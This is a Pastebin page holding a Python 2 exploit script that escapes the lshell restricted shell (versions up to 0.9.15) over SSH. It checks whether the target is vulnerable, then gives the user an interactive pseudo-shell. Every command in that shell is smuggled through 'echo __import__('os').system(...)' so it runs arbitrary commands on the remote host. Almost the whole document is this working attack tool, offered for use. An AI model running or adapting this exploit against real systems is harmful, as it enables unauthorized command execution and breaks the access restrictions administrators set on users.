daily pastebin goal
24%
SHARE
TWEET

lshell 0.9.15 remote

a guest Dec 30th, 2012 352 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import paramiko
  2. import traceback
  3. from time import sleep
  4.  
  5. #
  6. # Exploit lshell pathing vulnerability in <= 0.9.15.
  7. # Runs commands on the remote system.
  8. # @dronesec
  9. #
  10.  
  11. if len(sys.argv) < 4:
  12.     print '%s: [USER] [PW] [IP] {opt: port}'%(sys.argv[0])
  13.     sys.exit(1)
  14.  
  15. try:
  16.     print '[!] .............................'
  17.     print '[!] lshell <= 0.9.15 remote shell.'
  18.     print '[!] note: you can also ssh in and execute \'/bin/bash\''
  19.     print '[!] .............................'
  20.     print '[!] Checking host %s...'%(sys.argv[3])
  21.     ssh = paramiko.SSHClient()
  22.     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  23.     if len(sys.argv) == 5:
  24.         ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
  25.     else:
  26.         ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
  27.  
  28.  
  29.     # verify lshell
  30.     channel = ssh.invoke_shell()
  31.     while not channel.recv_ready(): sleep(1)
  32.     ret = channel.recv(2048)
  33.  
  34.     channel.send('help help\n')
  35.     while not channel.recv_ready(): sleep(1)
  36.     ret = channel.recv(2048)
  37.  
  38.     if not 'lshell' in ret:
  39.         if 'forbidden' in ret:
  40.             print '[-] Looks like we can\'t execute SSH commands'
  41.         else:
  42.             print '[-] Environment is not lshell'
  43.         sys.exit(1)
  44.  
  45.     # verify vulnerable version
  46.     channel.send('sudo\n')
  47.     while not channel.recv_ready(): sleep(1)
  48.     ret = channel.recv(2048)
  49.     if not 'Traceback' in ret:
  50.         print '[-] lshell version not vulnerable.'
  51.         sys.exit(1)
  52.     channel.close()
  53.     ssh.close()
  54.  
  55.     # exec shell
  56.     print '[+] vulnerable lshell found, preparing pseudo-shell...'
  57.     if len(sys.argv) == 5:
  58.         ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
  59.     else:
  60.         ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
  61.  
  62.     while True:
  63.         cmd = raw_input('$ ')
  64.  
  65.         # breaks paramiko
  66.         if cmd[0] is '/':
  67.             print '[!] Running binaries won\'t work!'
  68.             continue
  69.  
  70.         cmd = cmd.replace("'", r"\'")
  71.         cmd = 'echo __import__(\'os\').system(\'%s\')'%(cmd.replace(' ',r'\t'))
  72.         if len(cmd) > 1:
  73.             if 'quit' in cmd or 'exit' in cmd:
  74.                 break
  75.             (stdin,stdout,stderr) = ssh.exec_command(cmd)
  76.         out = stdout.read()
  77.         print out.strip()
  78. except paramiko.AuthenticationException:
  79.     print '[-] Authentication to %s failed.'%sys.argv[3]
  80. except Exception, e:
  81.     print '[-] Error: ', e
  82.     print type(e)
  83.     traceback.print_exc(file=sys.stdout)
  84. finally:
  85.     channel.close()
  86.     ssh.close()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top